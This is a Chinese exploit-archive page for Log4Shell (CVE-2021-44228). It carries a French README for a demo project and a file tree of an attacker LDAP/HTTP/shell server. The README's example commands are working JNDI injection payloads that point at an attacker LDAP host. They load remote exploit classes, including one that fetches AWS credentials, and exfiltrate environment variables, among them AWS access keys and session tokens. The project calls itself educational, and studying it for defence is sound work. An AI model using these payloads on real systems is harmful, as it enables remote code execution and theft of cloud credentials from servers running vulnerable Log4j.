POC详情: 9da9788670ded4e59b6c89f29338ddebdbce2503

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Démo du fonctionnement de log4shell (CVE-2021-44228)
介绍
# Log4Shell

Ce projet est une démonstration du fonctionnement de la faille de sécurité log4shell.

Cette faille est décrite dans la CVE-2021-44228.

Le projet est destiné à un usage pédagogique uniquement.
Il ne doit être utilisé que sur votre propre système et uniquement dans un but expérimental.

**Toute exécution est effectuée à vos risques et périls.**
**L'auteur décline toute responsabilité en cas d'incident en conséquence de l'exécution du projet.**


## Exemple de commandes
    
    ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
    hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
    hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
    hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'
    
文件快照

[4.0K] /data/pocs/9da9788670ded4e59b6c89f29338ddebdbce2503 ├── [4.0K] gradle │   └── [4.0K] wrapper │   ├── [ 58K] gradle-wrapper.jar │   └── [ 200] gradle-wrapper.properties ├── [7.9K] gradlew ├── [2.7K] gradlew.bat ├── [4.0K] hello │   ├── [ 831] build.gradle.kts │   └── [4.0K] src │   └── [4.0K] main │   ├── [4.0K] java │   │   └── [4.0K] log4shell │   │   └── [ 484] Hello.java │   └── [4.0K] resources │   └── [ 316] log4j2.xml ├── [ 558] install ├── [ 34K] LICENSE ├── [4.0K] log4shell-server │   ├── [1.0K] build.gradle.kts │   └── [4.0K] src │   ├── [4.0K] main │   │   ├── [4.0K] java │   │   │   └── [4.0K] log4shell │   │   │   ├── [4.0K] aws │   │   │   │   ├── [3.2K] Creds.java │   │   │   │   ├── [4.3K] FetchCreds.java │   │   │   │   ├── [1.4K] InstanceSession.java │   │   │   │   └── [ 370] LogCreds.java │   │   │   ├── [ 273] Command.java │   │   │   ├── [ 995] CommandParser.java │   │   │   ├── [1.4K] Config.java │   │   │   ├── [ 204] Exploit.java │   │   │   ├── [ 741] ExploitP.java │   │   │   ├── [2.5K] HttpClient.java │   │   │   ├── [7.7K] HttpServer.java │   │   │   ├── [ 948] IO.java │   │   │   ├── [ 519] Json.java │   │   │   ├── [2.7K] LdapServer.java │   │   │   ├── [1.5K] LogCommand.java │   │   │   ├── [ 597] NoOpCommand.java │   │   │   ├── [2.3K] RunCommand.java │   │   │   ├── [1.1K] ShellServer.java │   │   │   ├── [ 125] WithHttpServerUri.java │   │   │   └── [ 116] WithParams.java │   │   └── [4.0K] resources │   │   └── [ 931] logback.xml │   └── [4.0K] test │   └── [4.0K] java │   └── [4.0K] log4shell │   └── [ 842] DnTest.java ├── [1.2K] README.md └── [ 401] settings.gradle.kts 18 directories, 34 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。